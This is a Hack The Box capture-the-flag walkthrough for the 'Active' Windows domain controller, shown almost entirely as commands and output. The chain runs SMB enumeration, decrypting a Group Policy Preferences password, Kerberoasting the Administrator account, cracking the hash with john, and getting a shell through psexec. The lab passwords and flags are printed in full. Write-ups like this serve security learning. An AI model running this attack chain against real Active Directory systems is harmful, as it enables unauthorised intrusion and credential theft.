Active

Hack The Box Machines Windows No Comments
$ nmap -p- -T4 -A 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-15 18:46:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 12m27s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-15T18:47:12
|_  start_date: 2021-07-15T12:23:17
$ echo 10.10.10.100 active.htb | sudo tee -a /etc/hosts
$ smbclient -N -L \\\\10.10.10.100
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available
$ nullinux -shares 10.10.10.100
[*] Enumerating Shares for: 10.10.10.100
        Shares                     Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$          Remote Admin
    \\10.10.10.100\C$              Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON        Logon server share
    \\10.10.10.100\Replication     
    \\10.10.10.100\SYSVOL          Logon server share
    \\10.10.10.100\Users           

   [*] Enumerating: \\10.10.10.100\Replication
       .                                   D        0  Sat Jul 21 06:37:44 2018
       ..                                  D        0  Sat Jul 21 06:37:44 2018
       active.htb                          D        0  Sat Jul 21 06:37:44 2018

[*] 0 unique user(s) identified
$ smbclient -N \\\\10.10.10.100\\Replication
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                10459647 blocks of size 4096. 5727843 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.7 KiloBytes/sec) (average 1.6 KiloBytes/sec)

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Decrypting GPP (Group Policy Password)
https://github.com/BustedSec/gpp-decrypt
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
$ smbclient //10.10.10.100/Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 5727843 blocks available
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> type user.txt
type: command not found
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> 
Kerberoasting
$ sudo ntpdate 10.10.10.100
15 Jul 15:41:50 ntpdate[3681]: step time server 10.10.10.100 offset +747.974316 sec
kali@kali:~/0.htb/machines/Active100$ GetUserSPNs.py -request active.htb/SVC_TGS
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1c1a7790574ab0fe8152996c2197b2f3$9472e03d5ae32cb98349393bb61804d404189c48cc708428b5f50b31b8f8f585772d138dd06aeaacf93673588023f0c244770c98177bd816e34f9c56aafefe0c36019d3a8828e14eaf34768cbb20ff01d7bd426a7b5896bb250e413bb795158423ffa79a813c5c997c333e3282b83dcdee721dd994d81ea3eda7c8b94f9c5c9ec14432bd16ed63f4ed473357a91d5800634f62502ca0aa1f70b56c6122d63dcc2e24016a2608580d307faa45ba558ab4f2add5855ed886caf5d6b60bd0a6b56688f24985afd0a1fc4f3ac7affbc6074964339a5b9979d7b6c97488c6308ae24f7d2a4b3f2e22e4aecbf954f8da14b9265737cf10a30d88769a9edbf9204070ae8e49d19f59def9131a5af9d8e3ea441682bf8ed8bd2b7fd65c2bdaa5b4fac235e95cf00d7992c35430e6eeccb70947961aae183449aad314a75ab855eaaab2dbd36460079e312cb2045a745a283ad3e56573a2d24c7ec644a5897cb66436dd8c9d4c49d5b618ac65a6dffe72d565bc36b294ba18ce947715654e7b76b092be3acb440bd0e50728f483a2ffdbfa1520cf7f5c16157a0688aae27e8503e86c94dac6350b94e6ba735066b6a0d376b6071287166321b2305602f9bce695bbd83ecae99c578800b569827dc89d01784a0f64a7292c4dc35e48d7970936da7f3e180574b860f5ea3b263baf4ed73eb6936cdb565992a70c89b92fb200e80c2037bdeb909b0d9481582ed26289b72c1d8cd4ab842db214a13c6e40861565a8b1b2663a1c9bd20664d5679bf3ab36ca97819cc2ccf1294e76c1d0f71b48564ebe3df61cd6e69843dd75c8a6e8b27f08162da5db402b93ee92a5530c4a02606a9b0ecd4800a5c9447d6a8764a4b4975d0aa1199b76d5dd36918086b93f902ec38fa1f925edce86f902f4270e3faf7ae412a8f9619752256e424e8bc23098a28f0e6c320d810b50ceb0830c8afa1322faf97a5e457df4de5dd86e3c3f61bf9d5c17fb950969d3f846d5b6f61bf897980c07600f5a6fe8543c819830bab24261c509b95dafc5eee747154bd6eece0109046ab81eecfa2ed6d13928ce19bd8fb7796ae6302d68acff53262907125c8c514b94ce3ba635a5b03de237d0722a8b4b195319a1810cbba027cfe005f9818184a6f9b448a5aaddbc6167761c62b41850c359a4a80115497432b901e843eb1892b26883a0b51bc8d5a170cb0c95d82d7ba635f10d3703937f8f5e155290aee46d4c54e6e13b622a070b126f334c1f98
kali@kali:~/0.htb/machines/Active100$ 
$ john ticket.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-15 15:44) 0.2016g/s 2124Kp/s 2124Kc/s 2124KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ psexec.py administrator@active.htb
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eDuwsVAz.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Yvrd on active.htb.....
[*] Starting service Yvrd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd \Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

C:\Users\Administrator\Desktop>

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation